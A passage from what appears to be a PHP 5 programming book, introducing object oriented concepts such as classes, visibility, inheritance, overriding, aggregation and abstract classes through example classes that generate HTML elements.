    Each of these sites hosts online discussions and, as such, has a very friendly, easy-
    to-use interface. All have very active memberships and you should find most of
    your questions answered within 24 hours. Before you post a question or use one of
    the other methods listed later to find help, be sure to read How To Ask Questions
    The Smart Way to help you do the homework for your question.5

    Note that when you ask for help on forums, the principle of helping others to help
    yourself comes to the fore. One of the most common mistakes that beginners make
    when posting a question is to write a message that says, “This script has a
    problem,” and paste their entire PHP script below it. Instead, it’s much better to
    narrow the problem down: identify the area where you’re having problems, and
    paste in that code snippet, along with other relevant information such as error
    messages, the purpose of the code, your operating system, and so on. The people
    who offer help generally don’t want to spend more than a few minutes on your
    problem (they’re doing it for free, after all), so saving them time will improve
    your chances of receiving a helpful answer.
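
    One possible shape for such a narrowed-down snippet is sketched below. It is only an illustration: the string being searched is made-up data, and the exact details worth reporting will depend on your own problem. The functions and constants used (error_reporting, ini_set, PHP_VERSION, PHP_OS, var_dump) are standard PHP.

```php
<?php
// Show every notice and warning while investigating the problem.
error_reporting(E_ALL);
ini_set('display_errors', '1');

// Environment details worth quoting in a forum post.
$environment = 'PHP ' . PHP_VERSION . ' on ' . PHP_OS;
echo $environment . "\n";

// The smallest input that reproduces the surprise (made-up data).
$haystack = 'Hello World!';
$result = strpos($haystack, 'Hello');

// var_dump() shows the type as well as the value, which makes it
// clear that the result here is the integer 0 rather than false.
var_dump($result);
```

    A few lines like these, together with the output they produce, give helpers something they can run themselves in seconds.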

    Also available to those with an IRC (Internet Relay Chat) client are numerous IRC
    channels dedicated to PHP development. Two of the more popular channels are
    #php on efnet.org,6 and ##php on freenode.net.7 These resources can provide
    immediate assistance for your problem but, like the forums, the channels’ users
    will expect you to have done your homework beforehand.

    Less convenient, but perhaps the most effective last resorts are the PHP mailing
    lists,8 where beginners are encouraged to use the PHP General User list.9 The lists
    are available for limited browsing, though it’s possible to search some of them
    using the Search tool on the PHP web site, and selecting the list of your choice
    from the search results.

    5
      http://www.catb.org/~esr/faqs/smart-questions.html
    6
      http://efnet.org/
    7
      http://freenode.net/
    8
      http://www.php.net/mailing-lists.php
    9
      http://news.php.net/group.php?group=php.general

Zend,10 the company developing the core of the PHP engine, also hosts a fairly
active forum for general PHP questions.11 Of course, if you want a guaranteed answer,
it’s worth investigating paid support options. More information can be found on
the Zend Network web site.12


What is OOP?
Just tackling the basics of object oriented programming, or OOP, could easily
constitute a whole book, and there are plenty of those out there to prove it! A vast
range of information is likely to be covered in any discussion of object oriented
programming, so this section will provide a quick overview to help you to understand
the basic concepts and to prepare you for the rest of the book. It’s not meant to be
a comprehensive primer, but rather is intended to initiate you into the world of
OOP.

Solution
The object oriented programming paradigm is an approach to programming that’s
intended to encourage the development of well-structured and maintainable
applications. Many PHP coders regard object oriented programming as some kind of
mystical art, given that examples of PHP frequently use only a procedural
approach.13

This is a shame, as there is much to be gained from adopting an object oriented
approach to developing PHP applications, perhaps the most important benefit of
which is code reuse. A well-written piece of object oriented code can easily be
employed to solve the same problem in other projects; we can simply slot it in
whenever we need it. There’s a growing number of object oriented code
repositories, such as PEAR14 and PHP Classes15, that can save you hours of slaving
over well-charted problems, and leave you free to focus on the specifics of your
application.

10
   http://www.zend.com/
11
   http://www.zend.com/forums/
12
   http://www.zend.com/core/network/
13
   Procedural programming is the name given to non-object-oriented programming
   approaches to problem solving that aim to break a programming task into a
   collection of subroutines.

     With the release of PHP 5, we’ve gained a greatly enhanced object model that
     provides improved performance and features that weren’t available in PHP 4. In
     practice, learning to use the object model provided by PHP requires us to achieve
     two goals, which usually have to be undertaken simultaneously:

     ■ You’ll need to learn the PHP class syntax and object oriented terminology.
     ■ You must make the mental leap from procedural to object oriented code.

     The first step is easy; after all, it’s just a matter of memorization. The second
     step, the mental leap, is both easy and challenging. Once you take the leap, you’ll
     no longer think about long lists of tasks that a single script should accomplish;
     instead, you’ll see programming as putting together a set of tools to which your
     script will delegate work.

     Classes Explained
     A class is a generic blueprint of something. “Of what?” you ask. Well, of just about
     anything: a car, a customer, a product, a button; any object that’s relevant to the
     application. A class is not actually an object. Instead, it defines the methods (or
     behaviors) and properties (or attributes, or state) of the object. A class is a plan that’s
     used to create an object just as the blueprint of a car is used to build a car—it’s
     simply a plan to achieve the desired product.
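
     As a quick preview of the blueprint idea, the sketch below defines a hypothetical Car class (it is not part of the book's code archive) and builds two separate objects from it. The syntax it uses is introduced step by step in the rest of this section.

```php
<?php
// Hypothetical class, used only to illustrate the blueprint idea.
class Car
{
    // Property: the state that each object carries for itself.
    public $color;

    public function __construct($color)
    {
        $this->color = $color;
    }

    // Method: a behavior that every Car object shares.
    public function describe()
    {
        return 'A ' . $this->color . ' car';
    }
}

// One blueprint, two distinct objects, each with its own state.
$first  = new Car('red');
$second = new Car('blue');

echo $first->describe() . "\n";
echo $second->describe() . "\n";
```

     The class itself never holds a color; only the objects built from it do, which is the sense in which a class is a plan rather than the finished product.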

     The PHP Manual contains a wealth of information on OOP,16 but if you have no
     knowledge of OOP, the best place to start trying to understand it is with the basic
     PHP class syntax.17 Let’s take a closer look at classes by creating a very simple
     one called HTMLParagraph that outputs an HTML paragraph element. Now, you may be
     wondering, “What use is a class that does so little?” But please bear with me
     through this gentle introduction; I promise it’s building to something useful!


     14 http://pear.php.net/

     15 http://www.phpclasses.org/

     16 http://www.php.net/oop5/

     17 http://www.php.net/manual/en/language.oop5.basic.php

We start with the keyword class, followed by the name of the class (in this case,
HTMLParagraph). Then we use opening and closing braces to delimit where the class
begins and ends:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
   ⋮ properties and methods in here
 }
 ?>



We can add properties and methods between these braces. Properties, also known
as member variables, are the attributes that will be available to the objects created
from this class. They hold the data values that the objects will need in order to
function. For example, an object created from the HTMLParagraph class will need a
property to store the contents of the paragraph. We declare this property to be private
using the private modifier, which we’ll discuss further on. By convention, and for
readability, properties are declared at the start of the class:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
   private $content;
   ⋮ methods under here
 }
 ?>



Methods describe the actions the objects will enable us to perform. The methods
of a class contain the instructions that the objects will need in order to function.
Let’s add some methods to our HTMLParagraph class:

                                                          HTMLParagraph.php (excerpt)

 <?php
 class HTMLParagraph
 {
   private $content;

   public function __construct($content = '')
   {
     $this->content = $content;
   }

   public function getSource()
   {
     return '<p>' . $this->content . '</p>';
   }

   ⋮ possibly more methods under here
 }
 ?>




     Here, we’ve added two methods to our class—__construct and getSource.
     __construct is a special method that initializes our objects for us, while getSource
     is a method that allows our HTMLParagraph objects to fulfill their purpose: to write
     a paragraph element in HTML.

     Methods can be seen as communication: an object can call a method on another
     object and receive an answer in return. For example, an object can call the getSource
     method on an object created from our HTMLParagraph class, and receive the HTML
     source for the paragraph element in response. The HTMLParagraph object takes care
     of all the details for us.

     As we’ve seen, methods are the actual workers of the class—its behaviors or actions.
     For example, our HTMLParagraph class has a getSource method to assemble the
     content into a valid HTML paragraph element. A method’s job is to do one thing
     and one thing only—and to do it well.

     The syntax for a method is straightforward (note that brackets indicate optional
     syntax):

      public|protected|private [static] function methodName([$param1[, $param2]]){…}
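
As a minimal sketch of that syntax, the listing below declares one ordinary method with an optional parameter and one static method. The Greeter class and its method names are hypothetical, invented only for this illustration; the static method is called with the :: operator, which is discussed later in this chapter.

```php
<?php
// Hypothetical class used only to illustrate method declarations.
class Greeter
{
  // Instance method with one optional parameter.
  public function greet($name = 'world')
  {
    return 'Hello ' . $name . '!';
  }

  // Static method: called on the class itself rather than on an object.
  public static function shout($text)
  {
    return strtoupper($text);
  }
}

$greeter = new Greeter();
echo $greeter->greet(), "\n";        // Hello world!
echo $greeter->greet('PHP'), "\n";   // Hello PHP!
echo Greeter::shout('static'), "\n"; // STATIC
```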
Encapsulation and Visibility
Encapsulation is a basic concept of object oriented programming that dictates that
a class should have a public interface and a private implementation. The public
interface is the appearance—put simply, the methods and properties—possessed
by an object created from the class, which all other objects can see and use. The
private implementation refers to the inner workings of the class, which only the
objects created from that class need to know about. The separation of the class’s
inner workings from its outer appearance is essential for the production of quality
object oriented code.

Users of your class should be able to use the class’s public interface, or API
(Application Programming Interface), without caring what’s inside, and with confidence
that they’ll obtain the desired output. Hiding the inner workings of a class from the
user ensures that we can change those internals as required over time (to fix bugs,
improve performance, or completely change how a method is implemented) without
causing interference or disruption to users. Think of a class as a black
box: users just plug their data into the object and receive the results they want.

We indicate the public interface and private implementation of our class by
describing the visibility of its properties and methods; in short, describing who can see
and access them. PHP 5 has three levels of visibility: public, protected, and private.
The public visibility level allows any object or script to see and use the attribute or
method.18 Protected visibility means that only those classes which inherit (we’ll
discuss the concept of inheritance in the pages to come) from the class, as well as
the class itself, can see the attribute or method. The private visibility level describes
cases in which only the class itself can see the method or attribute. Note that in our
example class the properties are private and the methods are public.
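
The three levels can be sketched in a few lines. The Account and SavingsAccount classes below are hypothetical and exist only to show which code may touch which property; they are not part of the HTMLParagraph example.

```php
<?php
// Hypothetical classes illustrating the three visibility levels.
class Account
{
  public $owner = 'Alice';      // visible to any script or object
  protected $currency = 'USD';  // visible in Account and its child classes
  private $balance = 100;       // visible inside Account only

  public function getBalance()
  {
    return $this->balance;      // allowed: we are inside Account
  }
}

class SavingsAccount extends Account
{
  public function describe()
  {
    // Allowed: $currency is protected, so a child class can read it.
    return $this->owner . ' saves in ' . $this->currency;
  }
}

$account = new SavingsAccount();
echo $account->owner, "\n";        // public property, read directly
echo $account->describe(), "\n";   // protected property, read by the child
echo $account->getBalance(), "\n"; // private data, exposed by a public method
// echo $account->currency; // fails: protected property accessed from outside
```

Only the public members form the interface that outside code relies on; the protected and private properties remain free to change.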

When you’re beginning to learn object oriented programming, there’s often some
degree of temptation to make all your properties and methods public and to avoid
thinking about encapsulation at all. However, it’s important for other users of your
class to know how your class should be used, and what behavior they can expect:
they’ll assume that everything that’s public is safe for them to use. Obviously, if you
then change those public members, you can cause a lot of problems! So, to meet the
objective of encapsulation we must reduce the visibility of all our properties and
methods to the lowest possible levels.

18
  Technically speaking, a method doesn’t need a visibility level. If none is provided, the method is
automatically public.


     Constructors and Destructors
     A constructor is a special method that’s used when we first instantiate or create
     the object. The constructor method is named __construct no matter what the class’s
     name is. Since the constructor is called when we create an object from a class, it’s
     in this method that we set any default values for the object’s properties—also referred
     to as instance variables, the properties of a specific instance of a class—or anything
     else that’s needed to initialize the object. In our example class, the constructor
     stores the paragraph text in the $content property. Another common example is an
     order class for a shopping cart: the cart is initialized in the __construct method,
     where the customer number is set, the number of items in the cart is set to zero,
     and the cart balance is set to zero dollars.

     A destructor is the constructor’s complement. Like the constructor, the destructor
     has a special name, __destruct, that’s used no matter what the class’s name is.
     __destruct is also a special method that runs immediately before an object is
     destroyed. It’s in the destructor that we tie up any loose ends we may have, for
     instance, closing a database connection or a file handle.
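
Here is a minimal sketch of the shopping cart idea mentioned above. The Cart class, its properties, and its getItemCount method are assumptions made for illustration; a real cart would do far more.

```php
<?php
// Hypothetical Cart class; all names here are illustrative assumptions.
class Cart
{
  private $customerNumber;
  private $itemCount;
  private $balance;

  // Runs when the object is created with the new keyword.
  public function __construct($customerNumber)
  {
    $this->customerNumber = $customerNumber;
    $this->itemCount = 0;
    $this->balance = 0.0;
  }

  // Runs immediately before the object is destroyed.
  public function __destruct()
  {
    echo 'Cart for customer ' . $this->customerNumber . " closed\n";
  }

  public function getItemCount()
  {
    return $this->itemCount;
  }
}

$cart = new Cart(42);
echo $cart->getItemCount(), "\n"; // 0
unset($cart); // no references remain, so the destructor runs here
```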

     Magic Methods
     __construct and __destruct are examples of what are known as magic methods.
     Magic methods are a collection of methods that perform special internal PHP class
     functions. They all begin with __ (double underscore) and you can read more about
     them in The PHP Manual.19 For example, the __toString method is called when
     an object created from the class is converted to a string. This comes in very handy,
     as you will see.

     Creating Objects
     Now that we know what a class is, it’s time to talk about objects. As we saw earlier
     in this chapter, an object is the item that’s created or, in object oriented terminology,
     instantiated, using the class as the blueprint. Thus the object is a concrete instance
     of the class. Because of this, we can instantiate multiple objects of the
     same class, each with its own individual characteristics and states, just as a single
     blueprint can be used to build multiple cars. The cars may all be the same make
     and model, but they’re all driving at different speeds, and have different mileage
     totals.

     19 http://www.php.net/manual/en/language.oop5.magic.php


Let’s look at some code that will help clarify the concept of objects:

                                                           HTMLParagraph.php (excerpt)

 $para = new HTMLParagraph('Hello world!');
 echo $para->getSource();



In the first line above, I instantiate the object with the new keyword, being sure to
pass along any data that the constructor will need. Basically, that line of code
instructs PHP to use the HTMLParagraph class to make a new object, and place that
object in the $para variable.

Since the object in $para is an implementation of the HTMLParagraph class, it has
all the functionality and properties of that class. The output of the above code listing
will be:

 <p>Hello world!</p>



The $this Variable
Now that we understand the difference between an object and a class, I want to back
up a bit. In the HTMLParagraph class file, you’ll find that the $this variable appears
in the class methods, such as the getSource method:

                                                           HTMLParagraph.php (excerpt)

 public function getSource()
 {
   return '<p>' . $this->content . '</p>';
 }



Within any method, including the constructor, the $this variable points to the object
in which the method is running, and allows the method to access other methods
and variables that belong to that particular object. So even though we may have two
HTMLParagraph objects running the same class function code, when we call the
getSource function on one of them, $this will point to the object that owns the
function we called: the one from which we’re retrieving the HTML source. The other
object’s content is left untouched.


     The -> (arrow) operator is the syntax we use to access an attribute or method that’s
     named within the object. You can use this operator to access an object’s properties
     and methods from the script, as well as from within the object itself.
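
To see $this at work, the sketch below repeats the first version of the HTMLParagraph class (so that the listing runs on its own) and creates two objects from it. The variable names $first and $second are just for illustration.

```php
<?php
// Copy of the chapter's first HTMLParagraph class, repeated here so the
// sketch is self-contained.
class HTMLParagraph
{
  private $content;

  public function __construct($content = '')
  {
    $this->content = $content;
  }

  public function getSource()
  {
    // $this is whichever object getSource was called on.
    return '<p>' . $this->content . '</p>';
  }
}

$first = new HTMLParagraph('First');
$second = new HTMLParagraph('Second');

echo $first->getSource(), "\n";  // <p>First</p>
echo $second->getSource(), "\n"; // <p>Second</p>
```

Both objects run the same method code, yet each call sees only the content of the object it was made on.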

     Treating an Object Like a String
     If you recall, the __toString method is called when an object created from the class
     is converted to a string. This will be very handy for our HTMLParagraph as it’ll allow
     our paragraph objects to be used in string concatenation. Here’s our __toString
     method:

                                                              HTMLParagraph.php (excerpt)

      public function __toString()
      {
        return $this->getSource();
      }



     Our __toString method calls the getSource method, which returns the HTML
     source for our paragraph. So now it’s possible to use it in this way:

                                                              HTMLParagraph.php (excerpt)

      <?php
      $para2 = new HTMLParagraph('The __toString method makes life' .
          ' easy!');
      echo "<h1>The Magic __toString Method</h1>\n";
      echo $para2;
      ?>



     The output from the above code listing will be:

      <h1>The Magic __toString Method</h1>
      <p>The __toString method makes life easy!</p>
Inheritance
Inheritance is another of the fundamental pieces of the object oriented paradigm
and is an important aspect of its expressive power. The term refers to a relationship
in which one class is defined as being a child or subclass of another. The child class
inherits the methods and properties defined in the parent class, and can change
them or add more of its own. Inheritance allows you to define the common methods
and properties of a class that you’d like all the child classes to share.

Our HTMLParagraph class creates an adequate HTML paragraph element, but there
are a lot more HTML elements besides paragraphs and they all share some common
features. Let’s create a parent class called HTMLElement and add all the common
methods and properties:

                                                       HTMLElement.class.php (excerpt)

 <?php
 class HTMLElement
 {
   protected $content;
   protected $tagname;
   protected $attributes;



Thinking about the common properties of HTML elements, we add two new properties,
$tagname and $attributes, to store the tag name and attributes of the
HTMLElement respectively. Notice that I’ve declared the properties protected. This
allows child classes to have access in order to redefine them. If we’d declared the
properties private, the child classes wouldn’t be able to access them.

The __construct method now takes a second argument for the element attributes:

                                                       HTMLElement.class.php (excerpt)

   public function __construct($content, $attributes = array())
   {
     $this->content = $content;
     $this->attributes = $attributes;
   }
     Our new getSource method now has all the smarts to create the source for any
     HTML element as long as the $tagname property is defined:

                                                         HTMLElement.class.php (excerpt)

        public function getSource()
        {
          return '<' . $this->tagname . $this->getAttributeSource() . '>'.
              $this->content .
              '</' . $this->tagname . '>';
        }



     The getSource method also needs the HTML source string for the element’s
     attributes. It obtains this by calling the getAttributeSource method, which loops
     through the attributes array.

     The getAttributeSource method builds and returns the source string for the HTML
     element’s attributes, if any are present:

                                                         HTMLElement.class.php (excerpt)

        public function getAttributeSource()
        {
          $attributes = '';
          if (count($this->attributes)) {
            foreach ($this->attributes as $attrnme => $attrval)
            {
              $attributes .= ' ' . $attrnme . '="' . $attrval . '"';
            }
          }
          return $attributes;
        }



     Finally, the __toString magic method remains the same as the previous version—it
     already does what we need it to, and it can be used for any HTML element:
                                                    HTMLElement.class.php (excerpt)

   public function __toString()
   {
     return $this->getSource();
   }
 }
 ?>



You can see that marking our HTMLParagraph class as a child of HTMLElement will
be far easier than building the HTMLParagraph class from scratch, since most of the
work has already been done for us. We use the extends keyword to indicate the
relationship:

                                                  HTMLParagraph.class.php (excerpt)

 <?php
 require_once 'HTMLElement.class.php';
 class HTMLParagraph extends HTMLElement
 {
   protected $tagname = 'p';
   public function __construct($content, $attributes = array())
   {
     parent::__construct($content, $attributes);
   }
 }
 ?>



HTMLParagraph is now a child of HTMLElement. Alternatively, we could say that
HTMLElement is the parent or superclass of HTMLParagraph. We’ve redefined the
$tagname property and changed the constructor method. Just ignore the
parent::__construct($content, $attributes); part for now; I’ll explain it very
soon.

Now we can instantiate the child class, gain access to the getSource method,
and—because we’ve redefined the $tagname property—the HTML source is output
appropriately for an HTML paragraph element:
                                                                  childClass.php (excerpt)

      <?php
      require 'HTMLParagraph.class.php';

      $para = new HTMLParagraph("The object oriented programming\n" .
          " paradigm is an approach to programming that's intended\n" .
          " to encourage the development of well-structured and\n" .
          " maintainable applications.",
          array(
            'id' => 'oop_intro',
            'class' => 'introduction'
          )
      );
      echo "<h1>OOP in PHP 5</h1>\n";
      echo $para;
      ?>



     The output for the above code will be:

      <h1>OOP in PHP 5</h1>
      <p id="oop_intro" class="introduction">The object oriented programming
       paradigm is an approach to programming that's intended
       to encourage the development of well-structured and
       maintainable applications.</p>



     This example shows the basics of how inheritance works, but the real power of this
     capability cannot be demonstrated without discussing overriding—the mechanism
     by which a child class can alter the methods and properties of its parent class.

     Overriding Methods and Properties
     It’s perfectly acceptable to give a method or property in the child class the same
     name as a method or property in the parent class; doing so overrides the method or
     property. In our HTMLParagraph class we override the $tagname property of the
     parent HTMLElement class. When we call HTMLParagraph->getSource and it grabs
     the $tagname value, it retrieves the overridden value p.

     To demonstrate, let’s create another child class; I give you the HTMLImage class.
     HTML image tags are constructed slightly differently—they have no end tag—so
     we’ll need to override the getSource method to handle this unique situation:
                                                                    HTMLImage.class.php (excerpt)

 <?php
 class HTMLImage extends HTMLElement
 {
   ⋮ the usual properties and constructor function

       public function getSource()
       {
         return '<'. $this->tagname . $this->getAttributeSource() .' />';
       }




           Overriding a Method? Watch your Arguments!
         When a child class overrides a method, PHP prefers (though it doesn’t require)
         the child class method to have the same number of arguments as the parent class
         method. If the number of arguments differs between the child and parent class
         versions of the method, your code will remain perfectly legal in terms of object
         oriented programming, and it’ll still run perfectly. However, it will cause an
         E_STRICT error to appear if E_STRICT warnings are enabled in php.ini.20


You can also have the child class make use of the parent class’s method or property
internally, even while overriding it. To ensure our classes produce quality HTML
I want to make sure all image elements have an alt attribute, even if it’s only to
alert the developer that it’s missing. We’ll override the getAttributeSource method:

                                                                    HTMLImage.class.php (excerpt)

       public function getAttributeSource()
       {
         if (!array_key_exists('alt',$this->attributes)) {
           $this->attributes['alt'] = 'This image needs alt text';
         }
         return parent::getAttributeSource();
       }
 }
 ?>



20
     E_STRICT warnings are defined by The PHP Manual as “Run-time notices. Enable [these notices]
to have PHP suggest changes … which will ensure the best interoperability and
forward-compatibility of your code.” [http://www.php.net/errorfunc/]

     We can use the parent keyword and the :: operator to call the parent class’s
     method. This trick saves us from duplicating functionality already contained in the
     parent class. Note that we can call the parent class by name to achieve exactly the
     same result. For example, the above parent method call could have also been written
     like this:

      return HTMLElement::getAttributeSource();



     Here, we’ve replaced the parent keyword with the name of the HTMLElement class.
     Although the output is exactly the same, using parent saves us from having to
     remember the name of the parent class while working in the child, and is the
     recommended syntax.21


                Overriding Constructors
              Most object-oriented languages—Java, for example—will run the constructor of a
              given parent class automatically, before running an overriding constructor in a
              child class. This behavior is known as cascading constructors.

              PHP doesn’t have this feature. If you create a constructor in a child class in PHP,
              be aware that you’re completely overriding the parent class’s constructor. You
              must call that constructor explicitly from your new constructor, for example, using
              parent::__construct(), if you want the parent class to handle its share of the
              object’s initialization.
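
The difference is easy to demonstrate. In the sketch below, the Base, ForgetfulChild, and CarefulChild classes are hypothetical names chosen for illustration; only the second child calls the parent constructor.

```php
<?php
// Hypothetical classes showing that PHP doesn't cascade constructors.
class Base
{
  public $initialized = false;

  public function __construct()
  {
    $this->initialized = true;
  }
}

class ForgetfulChild extends Base
{
  public function __construct()
  {
    // The parent constructor is not called, so $initialized stays false.
  }
}

class CarefulChild extends Base
{
  public function __construct()
  {
    parent::__construct(); // explicitly run the parent's initialization
  }
}

$forgetful = new ForgetfulChild();
$careful = new CarefulChild();
var_dump($forgetful->initialized); // bool(false)
var_dump($careful->initialized);   // bool(true)
```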


     We can see overriding in action in this example:

                                                                                 overriding.php (excerpt)

      <?php
      require 'HTMLImage.class.php';
      $logo = new HTMLImage('',
          array(
            'id' => 'logo',
            'src' => 'php.gif'
          )
      );
      echo $logo;
      ?>

     21
          PHP’s double colon operator (::) is called the scope resolution operator, or Paamayim Nekudotayim.
     This may seem like a strange choice for naming a double-colon, but while writing the Zend Engine 0.5
     (which powers PHP 3), that’s what the Zend team decided to call it. It actually does mean
     double-colon, in Hebrew!




The above code will output the following:

 <img id="logo" src="php.gif" alt="This image needs alt text" />



If you examine the output, you can see that the HTMLImage->getAttributeSource
method has added the missing alt attribute, just as we intended.

Object Aggregation and Composition
In addition to inheritance, objects can interact in other ways; for example, one object
can use another object to perform a function either by creating the object to be used
to perform the function or by receiving it through a method’s arguments. Such
interactions demonstrate the expressive power of the object oriented paradigm.

There are two ways in which one object can use another: aggregation and composition.

Aggregation
Aggregation occurs when one object is given another object on a “temporary loan.”
The second object will usually be passed to the first through one of the first object’s
methods—for instance, the constructor. The first object is then able to call methods
in the second, which means it can use the functionality stored in the second object
for its own purposes.

Let’s look at an example of aggregation in action. We’ll build an HTMLUnorderedList
class that can hold an array of HTMLListItem objects. The HTMLListItem class is a
simple extension of the parent HTMLElement class:

                                                        HTMLListItem.class.php (excerpt)

 <?php
 require_once 'HTMLElement.class.php';
 class HTMLListItem extends HTMLElement
 {
   protected $tagname = 'li';

   public function __construct($content, $attributes = array())
   {
     parent::__construct($content, $attributes);
   }
 }
 ?>




     The HTMLUnorderedList class, however, has a new property and method:

                                                     HTMLUnorderedList.class.php (excerpt)

      <?php
      require_once 'HTMLListItem.class.php';
      class HTMLUnorderedList extends HTMLElement
      {
        ⋮ other properties…
        private $items = array();

        ⋮ constructor method…

        public function addListItem(HTMLListItem $item)
        {
          $this->items[] = $item;
        }

        public function getSource()
        {
          if (count($this->items)) {
            $this->content = '';
            foreach ($this->items as $item)
            {
              $this->content .= $item->getSource();
            }
          }
          return parent::getSource();
        }
      }
      ?>



     The addListItem method takes an HTMLListItem object as an argument and adds
     it to the array of list items stored in the $items property. The getSource method
has also been overridden to be able to construct the HTML list element using the
list items.


       Type Hinting Demystified
      As you can see, I used type hinting in the addListItem method. A type hint is
      a specification that an argument for a method must be an object of a specified
      class. If the script doesn’t pass the method an object of the specified type, it
      will cause a fatal error (or, as of PHP 5.2, a recoverable error) to be raised. In our
      example, the declaration addListItem(HTMLListItem $item) requires the
      script to pass the method an HTMLListItem object.

      Type hinting can also be applied to object interfaces, which we discuss in the
      section called “Object Interfaces”. The convention in PHP programming is, in fact,
      to only type hint interfaces, not concrete class implementations. However, we can
      be forgiven for doing so in our simple OOP introduction.
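
The following sketch shows a type hint accepting one argument and rejecting another. ListItem and ItemList are hypothetical stand-ins for the chapter’s list classes. Note one assumption: the try/catch block relies on PHP 7 or later, where a failed type hint throws a TypeError; on PHP 5.2 the failure is the recoverable error described above, which this catch block would not intercept.

```php
<?php
// Hypothetical stand-ins for the chapter's list classes.
class ListItem
{
}

class ItemList
{
  private $items = array();

  // The type hint restricts $item to ListItem objects (or subclasses).
  public function addListItem(ListItem $item)
  {
    $this->items[] = $item;
  }

  public function count()
  {
    return count($this->items);
  }
}

$list = new ItemList();
$list->addListItem(new ListItem());    // accepted

try {
  $list->addListItem('not an object'); // rejected by the type hint
} catch (TypeError $e) {
  // Assumption: PHP 7 or later, where the failure is a TypeError.
  echo "Rejected: wrong argument type\n";
}

echo $list->count(), "\n"; // 1
```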


Composition
Composition describes the style of object oriented programming where one object
completely owns another object; that is, the first object was responsible for
instantiating the second object. There are many cases in which composition can be useful,
although it’s most commonly used when it’s likely that the first object will be the
only one that needs to use the second.

For example, let’s create a class to represent a web site logo graphic. We want the
class to be able to output the HTML for the logo image, and to do that, it uses our
HTMLImage class like so:

                                                               WebsiteLogo.class.php (excerpt)

 <?php
 require_once 'HTMLImage.class.php';
 class WebsiteLogo
 {
   private $img;

   public function __construct($imagesrc, $title, $alt)
   {
     $this->img = new HTMLImage('', array('src' => $imagesrc,
         'title' => $title,
         'alt' => $alt,
         'class' => 'sitelogo'));
   }

   public function getSource()
   {
     return $this->img->getSource();
   }

   public function __toString()
   {
     return $this->getSource();
   }
 }
 ?>




     Since the HTMLImage class already knows how to write the HTML for the image tag,
     we can use an instance of HTMLImage and just supply the correct image source, title,
     and alternative text for our web site logo graphic. We are also able to enforce the
     output of a specific class name in our web site logo <img> tag. When the
     WebsiteLogo->getSource method is called, it just calls the getSource method for
     the HTMLImage object.

     Using Aggregation and Composition: Benefits and Pitfalls
     In terms of practical development, it’s important to know when to apply aggregation
     or composition. How can you tell when object A should aggregate or compose object
     B? Ask yourself, “What happens if object A dies? Will object B still be alive?” If
     object B is required to outlive the death of object A, object A should aggregate object
     B. But if it’s better that object B dies when object A dies, then object A should
     compose object B.

     Aggregation offers the advantage of lower overhead than composition, because a
     single object will be shared by many other objects. It’s certainly a good idea to
     aggregate your database connection class; composing it with every object that wants
     to make a query may result in multiple connections to your database, which will
     cause your application to grind to a halt whenever it attracts high levels of traffic.

     Composition makes classes easier to work with because they’re self-contained. The
     code that uses the class doesn’t have to worry about passing it the other objects it
     needs, which, in a complex application, can often become so tricky as to require us
     to develop a design workaround. Another advantage of composition is that, when
working with code that uses it, we know exactly which class has access to the
composed object.

One of the problems with aggregation is that an object which shares the aggregated
object may do something to its state that makes it unusable by the other
objects that are supposed to be able to use it.

Composition produces tighter coupling—that is, greater dependency—between the
two objects involved, making it more difficult to reuse one without the other.
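
The two styles can be placed side by side in a short sketch. Every class here (Logger, OrderService, Importer) is hypothetical and exists only to contrast an object that is handed its collaborator with one that creates its own.

```php
<?php
// Hypothetical classes; all names are assumptions for illustration.
class Logger
{
  public $lines = array();

  public function log($message)
  {
    $this->lines[] = $message;
  }
}

// Aggregation: the Logger is created elsewhere and passed in.
class OrderService
{
  private $logger;

  public function __construct(Logger $logger)
  {
    $this->logger = $logger;
  }

  public function placeOrder()
  {
    $this->logger->log('order placed');
  }
}

// Composition: the object creates and owns its own Logger.
class Importer
{
  private $logger;

  public function __construct()
  {
    $this->logger = new Logger();
  }

  public function run()
  {
    $this->logger->log('import finished');
  }
}

$shared = new Logger();
$service = new OrderService($shared);
$service->placeOrder();
unset($service);                  // the shared logger outlives its user
echo count($shared->lines), "\n"; // 1

$importer = new Importer();
$importer->run(); // its logger is reachable only through $importer
```

When $service goes away the aggregated logger survives, whereas the logger composed by $importer lives and dies with it.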

Polymorphism
Another powerful aspect of object oriented programming is polymorphism—the
ability of different objects to share an interface and thus become interchangeable.

An interface is the name given to one or more methods that let you use a class for
a particular purpose. For example, imagine you have two database connection
classes—one for MySQL, and one for PostgreSQL. As long as both of them offered
a query method, you could use them interchangeably for running queries on different
databases—of course, your SQL would have to be valid in both databases. In this
case, the query method would represent a simple interface that the two classes
shared.
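
A rough sketch of that idea follows. The two connection classes are hypothetical stubs that never touch a real database, and the countUsers function and the SQL string are likewise assumptions made for illustration.

```php
<?php
// Hypothetical stubs: neither class talks to a real database.
class MySQLConnection
{
  public function query($sql)
  {
    return 'MySQL ran: ' . $sql;
  }
}

class PostgreSQLConnection
{
  public function query($sql)
  {
    return 'PostgreSQL ran: ' . $sql;
  }
}

// Works with any object that offers a query method.
function countUsers($db)
{
  return $db->query('SELECT COUNT(*) FROM users');
}

echo countUsers(new MySQLConnection()), "\n";
echo countUsers(new PostgreSQLConnection()), "\n";
```

The calling code never checks which class it was given; it relies only on the shared query method.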

Classes sharing the same interface often inherit from a parent class that makes
the common methods available, or implement a common interface. This concept
is best illustrated by the following examples.

Abstract Classes and Methods
Our parent class, HTMLElement, contains all the common functionality for all our
child classes. However, we don’t really want to be able to instantiate an object from
the HTMLElement class, because it has no tag name information and wouldn’t output any
useful HTML. So we use the abstract keyword to make this an abstract base class,
which provides an outline of the minimum functionality required for an HTMLElement
object: the common getSource and getAttributeSource methods. We extend the
HTMLElement class to define concrete child classes, each of which implements a specific
approach to building an HTML element:

                                                      AbstractHTMLElement.class.php (excerpt)

      <?php
      abstract class HTMLElement
      {
        ⋮ common properties and methods…
      }
      ?>



     The terms abstract and concrete refer to class usage—in particular, whether a class
     is intended to be used directly or not.

     An abstract class is one that has some functionality or structure that’s to be shared
     by all subclasses, though the class itself can’t be used directly. In other words, we’re
     not supposed to create objects from an abstract class. If we try to do so, we’ll raise
     a fatal error. A concrete class is a subclass of the abstract class from which we can
     create objects.
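
As a small sketch of the abstract and concrete split, the hypothetical Shape and Circle classes below share one method. The instantiation that would fail is left commented out, and the Reflection API is used only to confirm that PHP regards Shape as abstract.

```php
<?php
// Hypothetical classes mirroring the abstract/concrete split.
abstract class Shape
{
  protected $name = 'shape';

  // Shared functionality available to every subclass.
  public function describe()
  {
    return 'I am a ' . $this->name;
  }
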